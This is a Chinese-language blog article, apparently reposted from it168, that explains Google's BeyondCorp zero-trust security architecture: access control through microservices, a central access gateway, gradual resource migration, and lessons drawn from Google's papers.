但有一點,就是要明確的告訴用戶,基於什麼原因,你的分數過低,要把補救方法明確的提示出來,不然用戶就陷入了迷思,然後會幹出一些亂七八糟的事情出來。換句話說,可以把規則形成問題,你的補丁打了嗎?殺毒軟件更新了嗎?然後通過驗證這些問題,賦予權限。

 三、訪問控制

策略訂好了以後就是控制措施,這裏也是國內大多數公司和Google做法有分叉的地方,Google當然有能力自己造所有輪子,操作系統都能自己寫,但國內公司很少會這麼干,同時在內部這些應用里,或多或少都會有外購的應用系統。

  1、微服務

傳統系統已經做了很多訪問控制手段,有的可能就是一個SSO賬號,這種方式是角色、權限是在後面邏輯上處理的,也就是說,你先進入內網門戶,然後通過門戶進入各個子系統。在進入門戶這個環節並不做後面的資源的驗證,把驗證放在了後端應用上處理。這也就是之前烏雲還在的時候,我們看到一旦拿到一個員工賬號,就可以在內部各種橫向漂移。

而在Google,則使用了微服務,把驗證邏輯和資源系統隔離,以實現靈活的驗證。加入你們採購了外部的一個財務系統,那麼財務系統在這裏只看作是一個原始數據的記錄系統。通過微服務方式的解耦,服務之間不再需要關心對方的模型,僅通過事先約定好的接口來進行數據流轉即可。因此策略層改變起來也很容易,這是其中一個關鍵。

  2、集中處理

零信任中有一個處理所有流量的ACCESS GATEWAY,這是個反向代理服務,集中了身份驗證和授權過程,統一進行處理,也是理想的日誌監控點。代理服務支持PKI證書,所有請求都通過HTTPS提供給網關,用戶和設備的數據在這時候被提取出來進行驗證授權。再接下來則是SSH,RDP或TLS連接,與資源進行安全會話,這就大大限制了攻擊面。

在某個時間點,根據動態數據來配置身份驗證,而不是單純的依靠網絡。這就是零信任系統的能力。但在初期的時候,這個動態,是需要經過磨合的。最簡單的例子是根據大多數人的共同的行為來調整策略,這裏就需要機器學習來輔助,讓機器來了解共同行為是什麼意思。

  四、資源遷移

最後一步則是資源的遷移。資源遷移有個灰度過程,關鍵系統往後放,先從簡單應用開始,這個應用應該適合粗粒度規則,且數據敏感度比較低,比如內部的wiki這種。為了防止在這個過程中的數據泄漏,Google初期是並聯傳統系統的,然後逐漸割接。Google非常強調他們把所有資源都放到公網上,消滅了網絡分區需求。但實際上,我們大可不必這麼冒險,傳統基於網絡層的控制方法仍然可以使用。

通過這個邏輯,只需要把流量指向訪問結構,就可以保護資源。在所有流量都經過網關的情況下,需要確保和應用的連接是安全的,每個請求必須端到端加密。但只有這麼個安全隧道是不夠的,還需要確保每個請求都被完全驗證授權,方法上可以是對請求證書和關聯數據進行簽名,再配置應用驗證,也可以是對特定IP列入白名單。

  五、總結

Google在基礎架構安全上付出了巨大的努力。我在看這些paper的時候就在想,為什麼Google公開宣傳內部的安全實踐呢,我以小人之心揣測,可能與Google雲相關,從Google一系列的博客來看,信息保護一直都是重點範圍。但對於我們這些安全從業者來說,這5個paper提供了很多安全的先進點,讓我們一探頂尖互聯網企業的基礎安全架構。整個閱讀理解過程中,有幾句話我覺得是特別值得總結的:

1、“我們不依賴於內部網絡分隔或防火牆作為我們的主要安全機制”

我曾在阿里工作過幾年,早在14年阿里安全就提出“去防火牆”。但當時的“去防火牆”思想,更多的是擺脫傳統盒子硬件防火牆層次,和Google還不一樣。零信任的核心主題是,它是一個無周邊架構,這和Google的員工分佈在全球各地辦公有關係。這並不是說防火牆完蛋了,而是說不作為“主要”安全機制。但是在借鑒過程上,去防火牆不是第一步,而應在各種認證、授權等機制建立后的最後一步。

2、“最終用戶登陸由中央服務器驗證,然後中央服務器向用戶端設備發送憑證,例如cookie或OAuh令牌,從客戶端設備到Google的每個後續請求都需要該憑據”。

零信任基於用戶和設備的狀態做出智能決策,憑證是動態的,也就是可撤銷、可審計、有較短時間期限。這其中說,每個後續都需要該憑據,這就是零信任的精髓了。

3、“實際上,任何發布的服務都使用GFE作為智能反向代理前端,這個代理提供了DNS,拒絕服務保護,TLS終止和公共IP託管”

把內部應用放到公網,可以實現端到端的前向加密,但卻讓系統面臨攻擊,通過反向代理來管理這些流量。現實而言,我們並不需要這麼激進,抗ddos保護對於中小企業來說,還是應該依靠外部力量。

4、“在企業局域網上不是我們授予訪問權限的主要機制。相反,我們使用應用程序級的訪問管理控制,允許我們只在特定用戶來自正確管理的設備以及期望的網絡和地理位置時才將內部應用程序公開。

身份認證是整個流程中的重要部分,但零信任獨特在於:用戶、設備組成一個可以實時進行信任決策的配置文件。舉例來說,我在北京從我的手機上登陸crm應用,那肯定不會在同一時間允許我在上海的pc上登陸。訪問策略上要麼允許,要麼提示你另一個認證因素。

安全性和可用性一直存在互相矛盾,安全部門要在這裏尋找平衡。每個公司也都有自己的風險容忍度,有的公司因為月餅開除員工,有的公司因為雲盤上傳開除員工。每一個處罰,都會引起內部很多爭論,對於零信任來說,決策是動態的,允許更多的自適應,其中機器學習是這裏的重要工具。

5、“我們積極地限制和監督已經被授予基礎設施管理權限的員工的活動,提供能安全和可控的方式完成相同任務的自動化,不斷努力消除特定任務的特權訪問需求。

零信任目的在減少內部威脅,整個架構中學習和適應是重要環節。同時也對自動化很敏感,在這麼大一個全球企業中,人工是不現實的。另外,整個項目對特權的檢查,會比對普通權限的檢查要仔細的多。

網站內容來源http://safe.it168.com/

【精選推薦文章】

智慧手機時代的來臨,RWD網頁設計已成為網頁設計推薦首選

想知道網站建置網站改版該如何進行嗎?將由專業工程師為您規劃客製化網頁設計後台網頁設計

帶您來看台北網站建置套版網頁設計台北網站改版設計台北RWD響應式網頁設計,各種案例分享

廣告預算用在刀口上,網站設計公司幫您達到更多曝光效益

跟着大公司學安全之BeyondCorp安全架構